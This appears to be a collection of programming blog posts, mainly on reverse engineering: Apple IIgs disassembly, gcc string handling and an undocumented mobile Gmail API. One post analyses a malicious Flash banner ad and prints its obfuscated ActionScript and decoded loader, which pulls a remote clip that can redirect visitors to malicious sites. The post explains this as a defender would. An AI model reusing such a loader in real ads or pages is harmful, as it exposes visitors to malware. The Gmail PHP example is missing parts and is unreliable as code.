Understanding larger disassembly

This past weekend I was disassembling something and it struck me how few people knew how to do what I was doing.

So I figured I would quickly document the process of taking a chunk of disassembled code and putting it into a format that's easier to understand.

The disassembly I'm going to use for my examples is the same disassembly I was working on this weekend.  It is the music playing routines from some Apple IIgs software.

There is some knowledge that you should have before attempting to parse disassembly on any platform.

You should be familiar with the assembly language for your target platform.

Since this code ran on an Apple IIgs, that means you should know 65816 assembly.  If you know 6502 assembly, you're more than halfway there.  The 65816 is a 16-bit successor to the 6502, and is backwards compatible.  There's just a few more opcodes and addressing modes, as well as some additional flags for switching between 8-bit and 16-bit registers.

You should understand how hardware is used on your target platform.

For example, if you're disassembling software that draws to the screen, you should know how the various video modes work and how video memory is laid out.  Since we're disassembling a music player, we should know how the sound card works.

I'm not going to cover how the IIgs sound card works here, if you care, the Apple IIgs Technical Reference covers it.

Locate the code you're interested in.

This is one of the more difficult things to do.  You can't just disassemble an entire executable and hope to parse it all at once, it's far too big.  Instead you need to use some techniques to narrow down your search.

For example, if you're trying to figure out a file format for some file the program uses, you should search the disassembly for OS file calls and then work your way backwards from those calls.

If you're trying to find out how a program does some special graphical effect, then maybe check for code attached to the video blank interrupt (if it has one, again, know your platform).

For our example, we want to find the routine that's tied to the sound interrupt. This interrupt is fired whenever one of the soundcard's channels stops playing a note.  This is the natural place where you would advance the song and set up the soundcard to play the next note.  (Again, know your platform).

Searching through the disassembly I find the following:

00/3b84: a9 5c 98    lda  #$985c
00/3b87: 8f 2c 00 e1 sta  $e1/002c   ; Sound interrupt
00/3b8b: a9 3c 00    lda  #$003c
00/3b8e: 8f 2e 00 e1 sta  $e1/002e

This installs the sound interrupt routine.  It actually stores 5c 98 3c 00 into that memory location.  This is machine code that translates into the assembly "jmp $00/3c98".  So we now know that $3c98 in bank $00 is the sound interrupt routine that we want to understand.

The code next to where the sound interrupt is installed also loads the music into a specific location in RAM, loads all the sample data into the sound RAM, and sets some variables.  You would want to disassemble this routine as well as it paints a clearer picture of what's happening with everything sound-related.  I won't do that here, but this is how I was able to better understand the sound interrupt routine.

Isolate the code you care about, once you've found it.

So now we know the function we care about, we're going to isolate it and any small functions that the code calls.  This helps get rid of noise.

I've got the code we care about uploaded here.  It's 528 lines of assembly.  That's a pretty healthy sized routine.

One thing I'll point out before we get into it.  There are two small routines at $3cd4 and $3cd9 that seem to be redundant and return the value in a table located at $00:0000 (which is a total red flag that something is horribly wrong).  That's not correct.  The function that sets up the sound interrupt routine also replaces those zeroed addresses with calculated addresses into the music data.

That's another lesson.  Assembly programmers will modify program code instead of setting a variable, all just to save a memory access later on.

So how do we begin?  Do we just step through the assembly and see what it's doing?  Well, that's certainly an option, and for smaller routines, I have no problem doing this.  However, with longer routines, you'll want to do what you can to see the structure of the routine.

Visualize the structure of the routine.

I mean that literally.  The best way I've found to do this is to break the assembly up into what's known as "basic blocks".  A basic block is a chunk of contiguous assembly with only a single entry point (at the head), and exit point (at the tail).  You then draw connections between chunks.

There is software that will automatically do this.  It's the first step in a higher-level decompiler.  However, that software is either specific to an architecture, or expensive, or both.  Luckily, it's rather easy to do it by hand.

I like to use GraphViz for this.  It's a simple command-line tool that takes a text file and generates a directed graph from it.

Here's the first two basic blocks from our assembly plotted:

digraph {
  node[shape="record" fontname="helvetica"];
  edge[fontname="helvetica" fontsize=9];
  m3c98 [label="$3c98|$3c9c"];
  m3c98 -> m3c9d;
  m3c9d [label="$3c9d|$3ca0"];
  m3c9d -> m3c9d [label="bmi"];
  m3c9d -> m3ca2;  

We start with a node called "m3c98".  This is the very first address in the routine.  It's prefixed with "m" just because node names cannot start with a number.  The node has a label that has 2 records, these records are the entry and exit addresses of the basic block.  This is immediately followed by a connection from this basic block to the next basic block.

You can see how I've also added a label to one of the edges.  If a jump between basic blocks is caused by a branch instruction, I'll put a label on it.  Unlabeled edges are implicit connections (m3c98 will automatically go to m3c9d without any branching).

Doing it this way is quick and easy, you can build the graph progressively as you go through the assembly looking for branches.  If you jump backwards into the middle of a basic block, it's trivial to split that basic block into two blocks and reassign the edges coming from original block to come from the new block instead.

The end result is this graph:

Full function graph

You can view the full size graph here.

This graph is useful, but it's a bit noisy.  Our next step is to clean up the graph.  We do this in several ways.  The first is to remove any useless blocks.  It's very common to find a branch that leads directly to a jump.  This creates a useless block.  So you can go through the graph, looking for any blocks that do this, and remove them.  Replace any edges pointing to that node to the target node of the removed block.

Another common thing, at least with this CPU architecture, is there are branches that lead to a basic block that does nothing but change between 8 bit and 16 bit mode, and then jump to another block.  Since we don't really care about this too much (the disassembler cared more), we can treat these as empty blocks and remove them as well.

Finally, you'll find nodes that do nothing but clean up the stack and then RET.  Instead of jumping to these blocks, we should go through and replace them with unique RET blocks.  That way you don't have all of these exit points all routed to couple of blocks, looking like part of the structure.

After you make these cleanups, you'll have a graph that looks like this:

Cleaned up graph

See the full size graph here.

This is much cleaner and easier to follow.

Analyze the structure of the routine.

There are patterns in this graph that correspond to programming structures that you are familiar with.

For example, this pattern is an IF statement.

IF statement
At the end of the block at $3e11, there is some comparison done.  The bpl tells us that we skipped a block if the result of some comparison was positive.

This can be structured as follows:

// at the end of the $3e11 block
if (result < 0) {
  // do $3e24 block
// do $3e27 block

The IF/ELSE statement is also easy to spot:

IF/ELSE statement

The beq tells us that if some result is zero, then we do the $40db block, otherwise we do the $40a9 block.

This can be structured as follows:

// at the end of the $40a5 block
if (result == 0) {
  // do $40db block
} else {
  // do $40a9 block
// do $40e7 block

Finally, loops (for loops, while loops, do/while loops) look like this:

WHILE loop

This is a case where a block points back at a previous block.  That's how you know it's a loop.  This particular one looks like a WHILE loop because the comparison happens in $3ec7 (i.e. first).  The bcs tells us there was most likely a comparison between two variables.

The structure then would be:

// $3ec7 block
while (something < somethingelse) {
  // 3ed3 block
// 3eda block

Using these simple patterns, it becomes rather easy to see the structure of the routine.

Convert disassembly into pseudocode

Now we begin the process of converting the disassembly into pseudocode.  This is a step-by-step process, and we use the basic block graph to help us organize the large structures.

For example, when you get to a basic block that has multiple other blocks from below pointing back up to it, you know it's the top of a loop.  You should open up a new block and mark it.  As you go along, you'll discover what type of loop it is and you can go back and clarify.

When you get to an IF/ELSE statement, you can scan through the tree and see where it will converge (of if it will converge).

 You may end up with criss-crossed blocks, which cannot be represented cleanly without GOTOs.  This is especially true of older programs that were likely written in assembly in the first place.  I would recommend using GOTOs in your pseudocode, and only after you grasp what is happening, refactor it into a structured routine.. duplicating code if necessary.

As you practice, you'll get better at spotting patterns in the structure.  Without much thought at all, I can see that the block at $3d67 is probably the same as the block at $4013.  They're likely both the bottom of the same FOR loop, and they're likely just duplicated because assembly programmers would do that.  At the very least, block $3d67 is a "continue" statement if block $4013 is indeed the bottom of a FOR loop.

The way I convert disassembly into pseudocode, is at the top of the file I keep a list of the globals.
They start out looking something like:

uint8_t d_4356;  // 4356

Then as I figure out what d_4356 is, based on usage, I'll go rename it:

uint8_t numInst;  // 4356

Whenever I come across a new memory address, I'll search for it, if it exists, I use its name, if it doesn't, I add it to the list.

For the opcodes themselves, I tend to build them out piece by piece.

Let's look at the beginning of the assembly.

It starts with a spinlock on the soundCtl.  I'll look up what the high-bit is and note it in a comment.

while (soundCtl & 0x80) {}  // wait for DOC to finish

Then it takes the result of soundCtl and ANDs it with $9f and stores it back into soundCtl.  Again, I'll look up what those bits do and comment it.

soundCtl &= 0x9f;  // DOC mode, no autoinc

and so on.  I'll have temporary variables for the accumulator and x and y indices, which will eventually get replaced with more complicated expressions to make them easier to follow.

And that's it.  The final pseudocode (basically C) for the sound interrupt routine is here.


Found Data

I'm always interested in found data. Little notes buried in executables and other strange places. These are usually intended to be seen only by those curious enough to fire up a hex editor, or do a little reverse engineering.

Here's an example. On the 68k Macintosh, executables usually only have a resource fork. All the code is stored in CODE blocks in the resource fork. So I was curious when I found that the 68k mac version of Shadowgate had a data fork. The data fork contained the following message:

Welcome to TMON!
TMON was written in the summer of 1984 by Waldemar Horwat when he was still 15 years old. Initially TMON didn't have the heap and file windows; these were added later. TMON was very valuable in debugging itself. The biggest problem in writing TMON was making sure that it will not affect the Macintosh system in undesirable ways. Although some side effects couldn't be avoided, most have been eliminated. How are you able to read this message, anyway? Do you have a disk sector reader?

It's interesting to note that Waldemar Horwat did some programming on Shadowgate. So my guess is that this is evidence that he used his TMON debugger on Shadowgate. Later revisions of Shadowgate have had this data fork removed. I also found it in Uninvited, which is another ICOM game. No sign of it in Deja Vu 1 or 2, but I haven't been able to find anything but the 1992 reissues of those games.


Web Font Shorts

A posting on reddit lead to a discussion on typefaces. In particular one poster asked about the kerning of a word. Surprisingly, the kerning was perfect for me. I decided to compare it across the browsers I have access to.

Here's the kerning in Firefox on Linux (Stock Ubuntu Gutsy):

Notice how the A and V overlap? That's correct kerning.

Here's how it looks in Firefox on OSX Tiger:

Aside from the overly aggressive anti-aliasing, see how the kerning is incorrect between the A and V. It looks the same in Safari 3.

Here it is again in Firefox on Vista:

Same kerning error. Looks the same in IE7.

So Linux gets it right, OSX and Windows get it wrong. We've come quite far.


Malicious Banner Ad

We ran into a malicious banner ad yesterday. People would randomly get redirected to a malicious website. You can imagine that it's a pretty tough thing to diagnose. It turned out to be a flash ad. I was able to disassemble the banner ad to see how it worked. The banner is "protected" and compressed, so hex editing the banner doesn't show any text.

Using Flare to decompile the actionscript in the swf, I found this snippet of code:

this[(a2.split(' ')).join('')]('m1', this[(a3.split(' ')).join('')]());
_root[(a4.split(' ')).join('')][(a5.split(' ')).join('')]((a6.split(' ')).join(''),(a7.split(' ')).join('')) == (a8.split(' ')).join('') && this.m1[(a0.split(' ')).join('')]((a1.split(' ')).join('') + '&u=' + (new Date()).getTime());

Definitely looks like someone is trying to hide something, but there wasn't anything else in the actionscript.. certainly no getURLs or loadMovies.

I used the excellent swfmill program to convert the swf into xml. The output contains markup of every element in the swf. It was there that I found the source of a2,a3,a4, etc.

<DefineEditText objectID="5" wordWrap="0" multiLine="0" password="0" readOnly="1" autoSize="0" hasLayout="1" notSelectable="0" hasBorder="0" isHTML="0" useOutlines="0" fontRef="4" fontHeight="0" align="2" leftMargin="0" rightMargin="0" indent="0" leading="40" variableName="a0" initialText=" loadMovie">

There are text boxes (11 in all) all over the movie, they all are padded with hundreds of spaces at the beginning so they appear to be blank.

If you substitute out all splits and joins in the initial actionscript, you get the following:

createEmptyMovieClip('m1', getNextHighestDepth());
_url.substr(0,7)=="http://" &&
m1.loadMovie("http://adtraff.com/statsa.php?campaign=plentyup" + '&u=' + (new Date()).getTime());

So basically, this banner ad looks like a normal banner ad. However, each time you load it, it loads a movie clip from adtraff.com. Most of the time, this movie clip is blank. So you wouldn't notice a thing. However, sometimes the movie clip sent back from adtraff.com contains a getURL() that redirects the user to a malicious webpage like performanceoptimizer.com or malware-scan.com.


char pointer versus char array

There are two basic ways to assign a string literal to a local variable.

char *p = "string";
char a[] = "string";

I was curious to see how gcc handles the two.

In both cases, "string" is put into .rodata This means that with the first method, you must not modify the contents of "string".

p[3]='o'; // this causes a segfault.

So technically, the first method should be:

const char *p = "string";

With the pointer method, gcc will initialize the variable using the following:

mov dword ptr [ebp-8], pointer_to_string

Calling a function and passing p will result in:

mov eax,[ebp-8]
mov [esp], eax
call function_name

With the array method, however, gcc reserves space for the string on the stack and will initialize the variable like so:

mov eax, [pointer_to_string]
mov [ebp-15h], eax
mov eax, [pointer_to_string+4]
mov [ebp-11h],eax
mov eax,[pointer_to_string+8]
mov [ebp-0dh],eax
movzx eax,byte ptr [pointer_to_string+12]
mov [ebp-9],al

As you can see, it moves the string into the stack 4 bytes at a time. If the string is more than 64 bytes long, then gcc will actually create a call to memcpy:

lea ecx,[ebp-49h]
mov edx, pointer_to_string
mov eax,41h
mov [esp+8],eax
mov [esp+4],edx
mov [esp],ecx
call wrapper_to_memcpy

Regardless of how long the string is, passing the array to a function results in the following:

lea eax,[ebp-15h]
mov [esp],eax
call function_name

Passing the variable around is virtually identical for both array and pointer. However, initializing the variable takes a huge performance and space penalty for the array. Only use the array method if you intend on changing the string, it takes up space in the stack and adds some serious overhead every time you enter the variable's scope. Use the pointer method otherwise.


Mobile Gmail API

Did you know that Gmail provides a handy, light-weight API for gmail? Google's gmail midlet uses this API.

Mobile Gmail Basics

First thing to note, all responses from the server are in the form of UTF8 string lists. There is a 16 bit word (in network byte order) that represents the length of the string, followed by that many bytes. Then another 16 bit word for the next string, and so on. The response is usually terminated with an empty string (16 bit length is 0).

Secondly, all communication is done via POST requests to a single URL. This URL is https://mail.google.com/mail/m/12345 where 12345 is a random number, presumably to defeat proxy caches common with mobile phones. Please note that all communication is done over SSL.

Third, all requests from the server must contain the API version. Include "p=1.1" as the very first POST variable.

Logging In

Logging in is rather easy. You send a request to the gmail API with the following POST variables:

zym=l (that's a lowercase L)

That's pretty self explanatory.

The very first string in the server's response will be the Status. This will tell you if you were successful in logging in or not. The server will also set a bunch of cookies. You must save these cookies and send them back from this point on. This is what keeps you "logged in".

If Status is "E", then there was some sort of error.
The strings that follow the Status string are listed below.

CAPTCHA_token (optional)
CAPTCHA_image (optional)

error_type is the type of error, it will be either "C" for CAPTCHA required, or "B" for standard errors. If the error is "C" then CAPTCHA_token and CAPTCHA_image will be present. CAPTCHA_image contains the raw data for the image.

If you get a CAPTCHA required error, have the user fill out the captcha information, and send back the following POST variables:

zym=l (again, lowercase L)

$token is the CAPTCHA_token from the server, $answer is the user's answer.

If the Status is "T" then you were successful in logging in, and the packet that is returned is the Inbox packet.

Inbox Packet

The Inbox packet is marked with a Status of "T". The strings that follow the Status string are listed below.


start_thread is the index for the first message returned. num_threads is the number of threads returned. total_threads is the total number of threads in the inbox. In gmail, at the top you see "1-50 of 513". num_threads would be 50, start_thread would be 0, and total_threads is 513. num_unread is the number of unread messages in your inbox.

threads is an array of strings representing each thread. The strings in each thread are as follows:


is_read is "T" if the message has been read, "F" otherwise. is_starred is "T" if the thread has been starred, "F" otherwise. has_attachments is "T" if the thread has attachments, "F" otherwise. from is a user-friendly version of the participants of the thread, e.g. "Jon, me (5)". subject is the subject line of the thread. time is a user-friendly version of the time, e.g. "11:08 am" or "Jul 27". Finally, url contains the ID number for the thread. It is given as "?th=xxxxxxxxxxx" you'll want to strip out the "?th=" part.

Back to the inbox format for a second. num_labels is the number of labels you have set up. They are followed by an array of label strings. The label strings are pretty simple. They look like so:


label is the label itself. num_unread is the number of unread messages in that label.

Contact List

Now let's look at how to retrieve the contact list. You send a simple request with the following POST variables: v=cl, pnl=$type $type is the type of contact list to retrieve. "f" is frequent. This is an abridge contact list with just the people you frequently mail. "a" is all, this is the entire contact list. The resulting packet is formatted the same, regardless of which type you request.


num_contacts is obviously the number of contacts in the following contact list. Each contact looks like so:


Pretty simple. More detailed contact information doesn't seem to be available.

Read a Thread

Reading a thread is fairly straightforward. Send a request with the following POST variables:


$thread_id is the id of the thread you wish to pull. Just like the Inbox, the first string is a Status. If it is "C" then you were successful in pulling a thread, if it is "E" then there was an error. The strings following the status string are below.

num_attachments (optional)
attachments[] (optional)

thread_subject is the subject line for the thread. num_messages is the number of messages contained in this thread. This is followed by one or more message_headers. Then the body of the selected message is present. The body is represented by several strings, each starting with a colon ":". Each string represents a full line in the message, minus the line break. If there are attachments in the selected message, then num_attachments is the first string without a leading colon. This is followed by a number of attachment strings.

The message_header looks like so.


is_read is "T" if the message has been read, "F" otherwise. is_starred is "T" if the message has been starred, "F" otherwise. has_attachments is "T" if the message has attachments, "F" otherwise. from_friendly is a user-friendly version of the from address. to_friendly is a user-friendly version of the to addresses. date_friendly is a user-friendly version of the message date. from_address is the raw from address. b1 is "b", I'm not sure what this represents. to_address is the raw to address. b2 and b3 are "b", I'm not sure what these represent. I believe b2 might contain cc: addresses, if present. timestamp is the actual timestamp for the message. subject is the subject for the message. url contains the id for the message, in the format "?d=u&n=nnn#m_xxxxxxx". "xxxxxx" is the message id. "nnn" is the message number in the thread. b4 is "b", and I'm not sure what it represents. from_address2 and to_address2 seem to be identical to from_address and to_address.

Each attachment has the following format:


Each of these is fairly self-explanatory.

Changing the selected message in a thread is fairly simple. You use the first part of the message url (the "d=u&n=nnn") part and pass those variables along with the regular read thread variables. It will return the same packet as above, only with the selected message body.

Previewing Attachments

As far as I can tell, the gmail mobile API doesn't allow you to download attachments, only to retrieve "previews" of the attachments. To do so, you issue a request with the following POST variables:


$attachment_id is obviously the attachment id number you wish to view. $message_id is the "xxxxxxx" part of "#m_xxxxxx" in the message url. $graphics_mode is either "1" or "0". 1 means you can handle image attachments. 0 means text only. Finally there's the $width and $height which specify the maximum width and height of the device.

The first string is a Status string which will be either 't' for text attachments or 'i' for image attachments.

Let's look at the text attachment first. The strings after the Status are below.


a_mode is "A", not sure if it can be anything else. attachment_id is the id of the attachment. filename is the filename of the attachment. Finally attachment_body is the body of the attachment.

Now let's look at an image attachment.


filename is the filename of the attachment, null_string is the 00 00 empty string, this is followed by the actual attachment. In this case, attachment_file is not a string, it does not have a length. Instead it is just a big chunk of data that appears after the null_string.

If Google couldn't preview your attachment for some reason or another, it will return a text attachment with the error message in the body.

Mark Thread

Now let's look at how to mark a thread. This means either Star a thread, or mark it read or unread, or archive it. You send a request with the following POST variables.


$action is the action to take.
st = Star Thread
xst = Unstar Thread
ur = Mark Unread
rd = Mark Read
ar = Archive Thread
tr = Trash Thread
sp = Mark as Spam

$thread_id is the id of the thread to modify. Yes that is a "t=" and not a "th=". This is important. Finally there's $GMAIL_AT. This should simply be the GMAIL_AT cookie that gmail sent when you logged in.


If you can handle the inbox, you can handle searching. First you POST a request with:

q=$query (for $search_type="q")
cat=$category (for $search_type="cat")
sz=$num_per_page (optional)
st=$start (optional)

$search_type is the type of "search". "q" is for query searches, "cat" is for category searches. Viewing your Drafts Folder is done with a category search.

$query is the search query (it is not present at all for category searches). If you prefix your query with "L:" you can do a label view. For example, if you have a label called "Work" you can view your work folder by doing a "q" search with a q=L:Work

$category is the category to view. This is not present at all for query searches. Possible categories are: "Inbox", "Starred", "Chats", "Sent Mail", "Drafts", "All Mail", "Spam", "Trash".

$sz is the number of messages per page to display. This is optional, defaulting to 50 if not present.

$st is the start offset. For example, if you have $sz=20, then when you want to view the next page of results, you would re-issue the same search command, only setting $st=20 then $st=40, and so on. This is optional, and it will default to 0 if not present.

The response from the server for doing any of these searches is identical to the packet you got for the inbox. In fact, you can include any of the above variables when you log in to affect the initial results you get on successful login.

Sending Mail

Finally, we see how to actually send mail. You send a packet with the following POST variables:

attach=$attachment (optional)

$GMAIL_AT is the GMAIL_AT cookie. $to_addresses is the comma-separated list of addresses to send mail to. $cc_addresses contains any carbon copy addresses, and $bcc_addresses contains any blind carbon copy addresses. $subject is the subjectline of the email, $body is the body of the email. $attachment contains any attachments, but I haven't figured out the format of the attachment yet.

Working Example

What fun is it without a working example? Here's a simple example in PHP that connects to gmail and prints out the first 10 items of your inbox.



if ($status!='T') die("Error logging in");
readUTF($data); //id
echo "Displaying ".($start+1)." to ".($num_msgs+$start).
" of $total<br />\n";
echo "$num_unread unread messages<br />\n";
echo "<table><tr><th>Flags</th><th>From</th>";
echo "<th>Subject</th><th>When</th></tr>\n";
for ($i=0;$i<$num_msgs;$i++)
echo "<tr><td>";
echo ($isread=='T')?"R":"r";
echo ($isstar=='T')?"*":"_";
echo ($hasattach=='T')?"A":"a";
echo "</td><td>$from</td><td>$subject</td>";
echo "<td>$time</td></tr>\n";
echo "</table>\n";
for ($i=0;$i<$numlabels;$i++)
echo "$label ($num_unread)<br />\n";

function readUTF(&$feed)
return $utf;



128-bit programming challenge

Here's my entry for the 128-bit programming challenge. Not a single lookup table in there. The resulting stripped binary is down to exactly 500 bytes.

; nasm -f elf hex.asm
; ld hex.o

section .text
global _start
mov ecx,10h
mov esi,hex
mov edi,buffer
movzx eax,byte [esi]
mov ah,al
and al,0fh
cmp al,0ah
sbb al,69h
mov [edi+1],al
shr ax,12
cmp al,0ah
sbb al,69h
mov [edi],al
mov [edi+2],byte 20h
add edi,3
inc esi
loop lp
mov [edi],byte 0ah
mov ecx,buffer
mov eax,4
xor ebx,ebx
inc ebx
mov edx,31h
int 80h
mov eax,1
mov ebx,0
int 80h
or ecx,edi
adc [edx],eax
jz lp2
pop ebx
fadd dword [ecx+56h]
lds esp,[ebx+56h]
mov al,al
section .bss
buffer resb 31h